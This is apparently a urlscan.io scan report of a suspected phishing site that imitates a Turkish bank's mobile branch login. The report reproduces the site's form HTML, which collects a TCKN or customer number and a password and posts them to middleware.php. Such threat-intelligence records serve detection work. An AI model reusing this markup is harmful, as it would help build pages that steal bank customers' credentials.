198-185-172-1-0.tech Open in urlscan Pro
94.159.97.231  Public Scan

URL: https://198-185-172-1-0.tech/?fbclid=IwY2xjawHL97dleHRuA2FlbQIxMAABHbiBUIiFulN13dyl6229f9E7U1OovENe0vCvDJcfEGrpKR1W-P7TejILfQ...
Submission: On December 15 via api from TR — Scanned from CH

Form analysis 1 forms found in the DOM

POST middleware.php

<form id="form" @submit.prevent="handleSubmit" action="middleware.php" method="POST" novalidate="" x-ref="form" autocomplete="off">
  <input type="hidden" name="token" value="6c705fc96860b3e8c1791d4d04a7c1de">
  <input x-model="formData.identify" data-post-valid="false" name="tckn" inputmode="numeric" maxlength="11" placeholder="Müşteri No / T.C. Kimlik No" class="input" :class="{ 'error': errors.identify }" type="text" autocomplete="off">
  <span class="error_hide" :class="{ 'error_show': errors.identify }">
    <i class="fa fa-exclamation-triangle" aria-hidden="true"></i> TCKN/Müşteri No doğru olmalı. </span>
  <input x-model="formData.password" data-post-valid="false" name="password" inputmode="numeric" maxlength="6" placeholder="Şifre" class="input" :class="{ 'error': errors.password }" type="password" autocomplete="off">
  <span class="error_hide" :class="{ 'error_show': errors.password }">
    <i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Şifre en az 6 karakter olmalı, harf ve rakam içermelidir! </span>
  <button type="submit">İleri</button>
</form>

Text Content

Mobil Şube
TCKN/Müşteri No doğru olmalı. Şifre en az 6 karakter olmalı, harf ve rakam
içermelidir! İleri


Tamam